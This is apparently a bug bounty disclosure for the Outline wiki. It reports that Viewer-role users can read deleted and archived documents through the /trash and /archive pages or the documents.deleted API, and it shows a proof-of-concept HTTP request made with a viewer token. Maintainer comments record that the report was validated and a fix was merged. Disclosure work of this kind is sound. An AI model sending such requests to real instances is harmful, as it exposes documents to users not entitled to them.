Documents in trash accessible by Viewer role in outline/outline

Valid

Reported on

Jul 3rd 2022


Description

Once a document is archived or deletec, there is no way to access it through the UI or the Document link. But, the API gives the file information and content. This is same with archived files.

Proof of Concept

  1. Give a user Viewer role.
  2. Visit https://your.getoutline.com/trash or https://you.getoutline.com/archive as a viewer (GUI doesn't have link to archive and trash pages and any archived or deleted document URL returns Not Found messages unless we open it via the gives URLs (/trash and /archive))
  3. or Send the following HTTP request with viewer's accessToken:
POST /api/documents.deleted HTTP/1.1
Host: softwarica.getoutline.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Origin: https://you.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer <token>
Connection: close


{"limit":25,"offset":0}

Impact

Unauthorized access to deleted and archived documents and its contents

We are processing your report and will contact the outline team within 24 hours. a month ago
nerrorsec modified the report
a month ago
nerrorsec modified the report
a month ago
outline/outline maintainer has acknowledged this report a month ago
Tom Moor modified the Severity from High (7.1) to Medium (5.4) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Moor validated this vulnerability a month ago
nerrorsec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor
a month ago

Maintainer


Fix ix in progress

nerrorsec
a month ago

Researcher


Thank you very much :-)

Tom Moor confirmed that a fix has been merged on 831df6 a month ago
The fix bounty has been dropped
documents.tsx#L23-L45 has been validated
documents.ts#L209 has been validated
documents.ts#L165 has been validated
to join this conversation